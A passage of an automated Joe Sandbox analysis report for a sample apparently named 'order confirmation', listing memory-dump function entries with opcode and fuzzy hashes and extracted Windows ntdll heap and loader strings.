                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-4253913091
                                                    • Opcode ID: 5fdf76fb31e97de2e2054c54231651551cdf19dd5bc9bca15b17a7828d1fa05a
                                                    • Instruction ID: 93f0bb6ac985914c74a6b6fae4ffb67b9339df73bd9e5a15c8d7f02e6c9aed8e
                                                    • Opcode Fuzzy Hash: 5fdf76fb31e97de2e2054c54231651551cdf19dd5bc9bca15b17a7828d1fa05a
                                                    • Instruction Fuzzy Hash: 43F1BE35A00646DFEB19CF68C880BAABBB5FB85708F14816DE4169B765D730ED81CF90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $@
                                                    • API String ID: 0-1077428164
                                                    • Opcode ID: 4fd45fca6b7739d655b60f08f9b061adb2e0bc8748e31a555b3c8dffa6d063bf
                                                    • Instruction ID: 086f95248a21ce0e65c144c5642ceecadf01afd5ac3f049778401ea7649d0f99
                                                    • Opcode Fuzzy Hash: 4fd45fca6b7739d655b60f08f9b061adb2e0bc8748e31a555b3c8dffa6d063bf
                                                    • Instruction Fuzzy Hash: 8BC2B2726083459FDB25CF28D881BABBBE5BF88718F04892EF999C7251D734D805CB52
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                    • API String ID: 0-2779062949
                                                    • Opcode ID: 2a70e88bec6f0a6142f807adca75dd233c7a5a14dcdf3182d5b96f6a036575f5
                                                    • Instruction ID: 5771c9fc42a61e4189008d2b1536b4daba44001371faf4aa269bca735bcbec6d
                                                    • Opcode Fuzzy Hash: 2a70e88bec6f0a6142f807adca75dd233c7a5a14dcdf3182d5b96f6a036575f5
                                                    • Instruction Fuzzy Hash: 2AA15F72911629DBDB32DF69CC88BAAB7B8FF44704F1141EAE908A7250D7359E84CF50
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0141A121
                                                    • Failed to allocated memory for shimmed module list, xrefs: 0141A10F
                                                    • LdrpCheckModule, xrefs: 0141A117
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-161242083
                                                    • Opcode ID: a631e5a0e0727c515cce23c3690fc42dd1b02d3df306a73566915c2328bbaf9b
                                                    • Instruction ID: 2983e3e291ec7908d4c44e701427f5e219d4689c780991cbaf981e90f01c668e
                                                    • Opcode Fuzzy Hash: a631e5a0e0727c515cce23c3690fc42dd1b02d3df306a73566915c2328bbaf9b
                                                    • Instruction Fuzzy Hash: 8671D1B1A002059FDF29DF6CD980ABEBBF4FB44A08F19402DE506AB765E734AD41CB50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-1334570610
                                                    • Opcode ID: f4f6f1569689dc7554fb05074ccd3c5cabe3cb66285cfb3f9dd4ffe296452360
                                                    • Instruction ID: f209865d57941bdbd0218a08a61b2dac6729e907fbc50a158814f57214d5bac9
                                                    • Opcode Fuzzy Hash: f4f6f1569689dc7554fb05074ccd3c5cabe3cb66285cfb3f9dd4ffe296452360
                                                    • Instruction Fuzzy Hash: DA61E074600345DFEB29CF28C480BAABBE5FF45B08F14855EE4598F2A6D770E881CB90
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 014282E8
                                                    • Failed to reallocate the system dirs string !, xrefs: 014282D7
                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 014282DE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1783798831
                                                    • Opcode ID: eb5c52c2c1b348e672af31d733c101975e7702d7d3d81d591edaef5fad665feb
                                                    • Instruction ID: c23c12ac1880e69b163a08ae845971daf04fec23510a3b9bdf722f28b719c318
                                                    • Opcode Fuzzy Hash: eb5c52c2c1b348e672af31d733c101975e7702d7d3d81d591edaef5fad665feb
                                                    • Instruction Fuzzy Hash: 6F41E472540325AFD721EB6CD844B5F7BE8EF54B58F46892AF948D72A0EB70D800CB91
                                                    Strings
                                                    • @, xrefs: 0146C1F1
                                                    • PreferredUILanguages, xrefs: 0146C212
                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0146C1C5
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                    • API String ID: 0-2968386058
                                                    • Opcode ID: d44b02483116f3e632dff15b7d50a7a5461e1b599dff7d72af70863989c650a9
                                                    • Instruction ID: a150486e8eb63ff13dc0714f9924d3a23a45c620a103b11abf7f0bcc787cabdc
                                                    • Opcode Fuzzy Hash: d44b02483116f3e632dff15b7d50a7a5461e1b599dff7d72af70863989c650a9
                                                    • Instruction Fuzzy Hash: 09416271E0020AEBDF11DBD8C881BEFBBBCAB14718F14406BEA49A7260D7749A458B51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                    • API String ID: 0-1373925480
                                                    • Opcode ID: 8b551baaaf282075f38f594e85aedec1363ccde1b69c85d4464242a5d74af159
                                                    • Instruction ID: 55a1426ecdee01a6f9fa44f7773059998c906e9108f7eef81f3461b12dc79824
                                                    • Opcode Fuzzy Hash: 8b551baaaf282075f38f594e85aedec1363ccde1b69c85d4464242a5d74af159
                                                    • Instruction Fuzzy Hash: AC411371A046488BFB22DBD9C844BAEBBB4FF55384F18045BD901EB7A1D7349901CB11
                                                    Strings
                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01434888
                                                    • LdrpCheckRedirection, xrefs: 0143488F
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01434899
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-3154609507
                                                    • Opcode ID: d2f53c51bb7b0e3fa512b2b3f9373b4a7ba5c014d0a04f09f7636cfdff98e331
                                                    • Instruction ID: a59b6cd7b3a0b0008a54d1482b4ae278a05a27e9b680b01950ebe0d6a0b94157
                                                    • Opcode Fuzzy Hash: d2f53c51bb7b0e3fa512b2b3f9373b4a7ba5c014d0a04f09f7636cfdff98e331
                                                    • Instruction Fuzzy Hash: 5341CF3AA142519BCB26CF29D840AA7BBE5AFCDB50B1A055FED489B371D730D800CB91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-2558761708
                                                    • Opcode ID: cd1c9a941e54c16d72543a06e7f083ccb59163bdf9e1816ba1b3f3c0ba831059
                                                    • Instruction ID: 387ed38da5562c7e1609fc7b163946080f6f425336eb97efb95b7caa81dd08e7
                                                    • Opcode Fuzzy Hash: cd1c9a941e54c16d72543a06e7f083ccb59163bdf9e1816ba1b3f3c0ba831059
                                                    • Instruction Fuzzy Hash: B111AE35395181DFD629DA18C440BA6B7A4EB82B19F18812EF4068F269DB30DC41C750
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01432104
                                                    • Process initialization failed with status 0x%08lx, xrefs: 014320F3
                                                    • LdrpInitializationFailure, xrefs: 014320FA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2986994758
                                                    • Opcode ID: 2b9a557a82f890365b654b6d2082ea2bf7b50d718ce48c9bb448b0615042058f
                                                    • Instruction ID: 0019028c5fe3d3319bbd215de92dd5e86541822ad5e929f12089fb6fc8041514
                                                    • Opcode Fuzzy Hash: 2b9a557a82f890365b654b6d2082ea2bf7b50d718ce48c9bb448b0615042058f
                                                    • Instruction Fuzzy Hash: 98F0C875640309BBEB24EA4DDD42F977F68EB84B58F51005AF6047B395D1F0A940CA91
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: #%u
                                                    • API String ID: 48624451-232158463
                                                    • Opcode ID: c44021722dcdeeb37e6e979136a1a689c7e9ced5938e9a38de0850c675eeabd5
                                                    • Instruction ID: 2c32e8ba161e594422a84261333b95273137a595c7bdd94b8ca1ba5925cff950
                                                    • Opcode Fuzzy Hash: c44021722dcdeeb37e6e979136a1a689c7e9ced5938e9a38de0850c675eeabd5
                                                    • Instruction Fuzzy Hash: 44715C71A0014A9FDB05DFA9C994BAEB7F8FF18704F15406AE905E7261EB34ED01CBA0
                                                    Strings
                                                    • LdrResSearchResource Enter, xrefs: 013BAA13
                                                    • LdrResSearchResource Exit, xrefs: 013BAA25
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                    • API String ID: 0-4066393604
                                                    • Opcode ID: e26e79876e379cedf01ceef3a96930cdcfde804def4ca321522d3cebf4de6497
                                                    • Instruction ID: 20e519a38c8f06e39ee95704fa6c9b1562e731b7232654ec3dcf3a2f69b0fd7b
                                                    • Opcode Fuzzy Hash: e26e79876e379cedf01ceef3a96930cdcfde804def4ca321522d3cebf4de6497
                                                    • Instruction Fuzzy Hash: 21E18171E006199FEF21CF9DC980BEEBBB9BF04318F14442AEA11E7A65E7749941CB50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$`
                                                    • API String ID: 0-197956300
                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction ID: cab5d24b21fc1038804d125b04219d735143ff7776ed248051fa0ef0d873dd02
                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction Fuzzy Hash: 2FC1D4312043429BE724CF29C845BAFBBE5AFD4718F284A2EF695CB2A0D775D505CB41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    • Opcode ID: 6376ac9940293bfa72c8132c5a795895eacf709244bd64be95fc950db88be81b
                                                    • Instruction ID: b48860c3f5359b07b6209e72c6f4db9fdf935632a4c1620f253b1cd26ed1ef8a
                                                    • Opcode Fuzzy Hash: 6376ac9940293bfa72c8132c5a795895eacf709244bd64be95fc950db88be81b
                                                    • Instruction Fuzzy Hash: FC616B71E002299FDB14DFA9C840BAEBBB9FB44704F54406EE649EB2A1D771E981CB50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$MUI
                                                    • API String ID: 0-17815947
                                                    • Opcode ID: 32cf3042d27560c7e87874c2ed20a041f6898b6b57a10d28c13188a19b9b547f
                                                    • Instruction ID: d742277bbe17674e0eb9582b27a62994379a89e2f6841bdcacde3981cd926104
                                                    • Opcode Fuzzy Hash: 32cf3042d27560c7e87874c2ed20a041f6898b6b57a10d28c13188a19b9b547f
                                                    • Instruction Fuzzy Hash: 4C512A71D0021DAFDF51DFA9CC84AEFBBB8EB44758F14052AEA11BB291E6309D45CB60
                                                    Strings
                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013B063D
                                                    • kLsE, xrefs: 013B0540
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                    • API String ID: 0-2547482624
                                                    • Opcode ID: e4a6dc631df09f60264c87d7198d7f37d6513582892ec248e03125ee5922f7d0
                                                    • Instruction ID: 5257ff025431090344233ede5645310ae1de7104cb3161c832164bebb76397bd
                                                    • Opcode Fuzzy Hash: e4a6dc631df09f60264c87d7198d7f37d6513582892ec248e03125ee5922f7d0
                                                    • Instruction Fuzzy Hash: 66517C715047428BD728DF68C5807E7BBF4EF94318F14483EE6AA87A41F770A545CB92
                                                    Strings
                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 013BA309
                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 013BA2FB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                    • API String ID: 0-2876891731
                                                    • Opcode ID: a4b9492d2527830f8fc6696e7f79288922565c926503e5e41b343519d8b7fc84
                                                    • Instruction ID: 86d3173767fc187c5f0be1c2aa6b1ec80f9ec9d16f90057553be64f24ac8a37c
                                                    • Opcode Fuzzy Hash: a4b9492d2527830f8fc6696e7f79288922565c926503e5e41b343519d8b7fc84
                                                    • Instruction Fuzzy Hash: F341B031A05A59DBDB11DF5DC480BAE7BB4FF84708F24406AEA08DBBA5E3B5D900CB50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Cleanup Group$Threadpool!
                                                    • API String ID: 2994545307-4008356553
                                                    • Opcode ID: 3f7c34b7d31cf3c587593949c98b315699cbe95d3d2420713857caa99ad077ed
                                                    • Instruction ID: 0597a406809cbf1e97d95ed8206166a20244d445aa1b20ac56fc4b2bc1c218da
                                                    • Opcode Fuzzy Hash: 3f7c34b7d31cf3c587593949c98b315699cbe95d3d2420713857caa99ad077ed
                                                    • Instruction Fuzzy Hash: 1E01D1B2250704AFD311DF24CE49B167BE8F785729F068979A658C71D0E334D804CB46
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: MUI
                                                    • API String ID: 0-1339004836
                                                    • Opcode ID: 5b5a48d2fed55ba966d3e840051a7892406cc327bb3d5650e3df7b2c08cf6193
                                                    • Instruction ID: bb445609edc4b43f278e99882f30ddba3bd0a8f2e2bce69c571744e7d704ddcb
                                                    • Opcode Fuzzy Hash: 5b5a48d2fed55ba966d3e840051a7892406cc327bb3d5650e3df7b2c08cf6193
                                                    • Instruction Fuzzy Hash: 3A825D75E002198FEB25CFA9C8C07EDBBB5BF44318F148169EA59ABB51EB309D41CB50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: a86e51bef6377dd8b10edc2a8e52850e01924d5493fdb97b4d5e5ec5890aaa9a
                                                    • Instruction ID: 1b07fe068d89d35f33d288629efcc27ccca211ac7c99e2a337f69595e1446181
                                                    • Opcode Fuzzy Hash: a86e51bef6377dd8b10edc2a8e52850e01924d5493fdb97b4d5e5ec5890aaa9a
                                                    • Instruction Fuzzy Hash: 2191637290021ABFEB21DB99DC85FAE7BB8EF58B54F154065F604AB1A0D674AD00CB60
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 838a76c078e089f38ea251dfd5fd3b48f0532d9131388a30b0e41aac6d93901e
                                                    • Instruction ID: dbcd99a89da3621e16039f939b79a22567287320a1988e2ffeeff47e049c6692
                                                    • Opcode Fuzzy Hash: 838a76c078e089f38ea251dfd5fd3b48f0532d9131388a30b0e41aac6d93901e
                                                    • Instruction Fuzzy Hash: 59918072900605ABDB22AFA9DC44FEFFB79EF45754F10002AFA05B7262D7349A02CB50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GlobalTags
                                                    • API String ID: 0-1106856819
                                                    • Opcode ID: 3722a6430008c22149d36e48ea4fc8cc234ec4300e3841d76835c0142b8e0a0b
                                                    • Instruction ID: 73334e4645a8d05d6574ea0dd6420b06bd97d3f8a31df5722d52c62ed2211a16
                                                    • Opcode Fuzzy Hash: 3722a6430008c22149d36e48ea4fc8cc234ec4300e3841d76835c0142b8e0a0b
                                                    • Instruction Fuzzy Hash: A1719175E0122ACFDF28CF9DD5806AEBBB1BF88710F55812EE905A7351E7709881CB50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .mui
                                                    • API String ID: 0-1199573805
                                                    • Opcode ID: 62a78676522fc55d64f9e1149274a6f9472279e944c0f88ed78908d3c7097448
                                                    • Instruction ID: f8dafdc063d416c0827665667637a2af8849dba38b5d130a24c5a2341be66dac
                                                    • Opcode Fuzzy Hash: 62a78676522fc55d64f9e1149274a6f9472279e944c0f88ed78908d3c7097448
                                                    • Instruction Fuzzy Hash: 9D51A772D002259BDF50DFADD840AEEBBB4AF04614F09412AEE11BB361E7349D41CBE4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: EXT-
                                                    • API String ID: 0-1948896318
                                                    • Opcode ID: 512f61578567f1271f6b32818e8e2320a8c0454865bfa748dd6370b21124e676
                                                    • Instruction ID: 0093f79b06e69cb8187e1cb5a270ccd962f8f072090e0fa4ee44f4aa25c3248b
                                                    • Opcode Fuzzy Hash: 512f61578567f1271f6b32818e8e2320a8c0454865bfa748dd6370b21124e676
                                                    • Instruction Fuzzy Hash: 274180725083529BD721DA79D940B6BBBE8AF88A1CF44093DF684E7140EA74DD04C796
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryHash
                                                    • API String ID: 0-2202222882
                                                    • Opcode ID: cf94d734ed713d02239605ff09d826a8b94d9a055ea01a064b256cff2c4a251a
                                                    • Instruction ID: 465844f2142b30c5f55c5e84d8612086ba8203dba16427e199768ba50d8b5671
                                                    • Opcode Fuzzy Hash: cf94d734ed713d02239605ff09d826a8b94d9a055ea01a064b256cff2c4a251a
                                                    • Instruction Fuzzy Hash: 1C4166B1D0052DAADB21DA54CC84FDEB77CAB54718F4085EAEB08AB150DB709E898F94
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #
                                                    • API String ID: 0-1885708031
                                                    • Opcode ID: 2a711413ca69e69e39fc17f2d41143b19a5720abe62ba31b1017b334e51deb62
                                                    • Instruction ID: ebc11a48d5ffedeeec47e3e7921d571d3cc9c1d926fd5950244eac9ea288fd61
                                                    • Opcode Fuzzy Hash: 2a711413ca69e69e39fc17f2d41143b19a5720abe62ba31b1017b334e51deb62
                                                    • Instruction Fuzzy Hash: A0310931A006599BFB22CB6DC850BAFBBA8DF06704F15402AE940AB2A1D775DC45CB54
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryName
                                                    • API String ID: 0-215506332
                                                    • Opcode ID: 93024c041f565f2bb770d8bc8689c7c7de36f7766769bfa19673d7dbd14f97c3
                                                    • Instruction ID: 8c51e93bc99bfbd2bd2695a6ad8159e49e8381af39451bbfc7147c1c3050dacb
                                                    • Opcode Fuzzy Hash: 93024c041f565f2bb770d8bc8689c7c7de36f7766769bfa19673d7dbd14f97c3
                                                    • Instruction Fuzzy Hash: 7431033690052AAFEB15DB5CD891E6FBF74EB80764F41812AEA05A7260D7309E44DBE0
                                                    Strings
                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0143895E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                    • API String ID: 0-702105204
                                                    • Opcode ID: 9ef93632830de2ca164146a603b4ae53dcdf30f1bb7c0c0c97db2dc73ee5a94e
                                                    • Instruction ID: 47735fed80686a682c2df42d512b53dd8cdfddc47f30a7a76742ec132487f296
                                                    • Opcode Fuzzy Hash: 9ef93632830de2ca164146a603b4ae53dcdf30f1bb7c0c0c97db2dc73ee5a94e
                                                    • Instruction Fuzzy Hash: D9012B322002039BE7206F5ADDC4A9BBF75EFD9668B45062FF6411A671CB306841CB92
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 17ba56c50b1d3f4122a01c2c4d102064b457ae879837f556151156ce00f3f59e
                                                    • Instruction ID: 492ebc85b3d1f10d5883457f933c19becffeefc8c4014712ed0ce57183b87f28
                                                    • Opcode Fuzzy Hash: 17ba56c50b1d3f4122a01c2c4d102064b457ae879837f556151156ce00f3f59e
                                                    • Instruction Fuzzy Hash: E542B136608301DBD765CF68C890E6BBBE5AB94304F08492FFE8697362D7B0D845CB52
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: afc8d9ce34d43c1312ea6fbccf285083efd2a83be0dd7e6433cf837f405aadd5
                                                    • Instruction ID: 07379212290d5343c860e2aa76d84ee4256dd383e6d49ce479dd5b4698ea8c61
                                                    • Opcode Fuzzy Hash: afc8d9ce34d43c1312ea6fbccf285083efd2a83be0dd7e6433cf837f405aadd5
                                                    • Instruction Fuzzy Hash: 18424E75A0021A8FEB25CFA9C841BAEBBF5BF48304F14809AE949AB251D7349D85CF50
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f70a75398280866e8f3a667cbd09663d4ba2fcba0cf5c0aa543fff3e21b9cb9a
                                                    • Instruction ID: 9ae6e5eeef933411d908b7768744ca42ec4f2752a924e05d093735d0c5c527da
